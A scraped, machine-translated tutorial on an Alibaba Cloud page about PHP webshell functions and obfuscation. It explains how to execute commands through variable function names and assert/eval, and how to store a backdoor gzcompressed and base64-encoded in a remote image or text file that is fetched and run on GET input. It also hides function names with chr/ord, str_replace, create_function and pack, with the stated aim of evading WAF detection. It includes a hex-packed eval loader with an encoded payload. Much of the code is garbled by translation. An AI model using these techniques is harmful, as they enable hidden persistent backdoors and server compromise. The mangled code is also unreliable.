PHP Webshell Common functions

Source: Internet
Author: User
Tags phpinfo

0x1

The function is called immediately after the string variable is appended with parentheses:

<? PHP $s = ' system '; $e = ' assert '; $s (' WhoAmI '); $e (' Phpinfo (); ');

0x2

Functions commonly used to execute commands are:

system (' command ')eval(' PHP code ')assert(' PHP code ')

These three most commonly used

0x3

Base64_encode/base64_decode

<? PHP $b Base64_encode (' WhoAmI '); Echo $b. ' <br/> '; Echo Base64_decode ($b). ' <br/> ';

0x4

Gzcompress/gzuncompress compressing data

<? PHP $c gzcompress (' WhoAmI '); Echo $c. ' <br> '; Echo gzuncompress ($c). " <br/> ";

0x5

From the above command execution, Base64 plus 64 encoded with GZ compression, we can write a backdoor like this.

First, the back door compression, and then the back door Base64_encode (base64 code to prevent the character cause codes error).

If the backdoor is a PHP code, in the end we can use assert or eval to execute it.

In PHP, there is a function like this:

file_get_contents (URL)

This function allows you to save the contents of a file remotely to a variable:

$shell file_get_contents (' Http://localhost/shell.jpg ')

Start testing, starting with the simplest examples.

Make gzcompress and Base64_encode encoded files:

<? PHP $c = ' System '; $data gzcompress ($c); $file _data Base64_encode ($data); Echo $file _data ; fwrite (fopen$file _data);

So we've created a system string that's compressed and then 64 encoded.

Use:

<? PHP $c file_get_contents (' Http://localhost/shell.txt '); # Get Data $s gzuncompress (base64_decode($c)); # Decrypt Data $s ($_get[session]); # Execute Command

So the question is, why do we have to turn a big circle and come back?

The reason is simple, you compress the data, it is possible that some WAF does not detect the content is dangerous.

0x6

ASCII transcoding function: Chr/ord

<? PHP $str = ' System ';  for ($count$countstrlen($str$count+ +)    {echo  substr($str$count, 1). ' ~ '. Ord (substr($str$count, 1)). ' <br/> ';}
/*
s~115
y~121
s~115
t~116
E~101
m~109*/

0x7

Str_replace Character substitution function:

<? PHP $s Str_replace (' P ', ', ' pspypsptpepmp '); Echo $s;
#system

0x8

Create_fuction () to create an anonymous function:

<? PHP # create_function (' parameter list ', ' PHP code string '); $info create_function (', ' phpinfo (); ' ); $info ();

0x9

Pack function

Pack (' Format ', hex string)

The pack function is a bit complicated, but not commonly used, if you want to convert a hexadecimal character, you can:

<? PHP $x Bin2Hex (' System '); $s PACK $x ); Echo $s. ' <br/> '; $s (' WhoAmI ');

The key usage of pack is that we can turn some sense functions into 16, then pack them back.

For example, Create_function (", $shell), $shell PHP code, we can use to hide some sensitive functions in PHP code.

 <? php   $shell  =pack  (' h* ', ' 2470617373776f72643d27 ').  $password . pack  (' h* ', ' 273b247368656c6c6e616d653d27 ').  $Username . pack  (' h* ', ' 273b246d7975726c3d27 ').  $Url . pack  (' h* ', ' 273b6576616c28677a756e636f6d7072657373286261736536345f6465636f64652827 '). ' ejzs/xt3hnd5jor/zazl71buw2rawqxu1uuqsopkgheabebslkid02g0gcyaaki7qyci+geczzxohm+ kjetiwzdbkmnzsi1fkmxhyzot8wqyk/hpcybjtjkzjln+z7n3vxvvx0bqtppjoozeoltq3/d73+/77tb6wqdbbxfhj2y/ 8zsb9c3gxn28vhunurhrrnc65cmxtzvo+vq0/hh5jvheuly6fi9cjba9s1h5ixyn/vanu18vffjnsnxeyl/ubnebzb3qbh3vs8/fhg/atbwuf/ Mistn+yfa9u7zb3wru. $f = Create_function ( " 

Pack usage can be a filial piety here: Perl pack

Summarize

Create a GZ compression and Base64 encoded file (such as Logo.png), which is obtained using file_get_contents.

Use the Str_replace/chr/ord/create_fuction function to bypass some WAF detection.

PHP Webshell Common functions

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.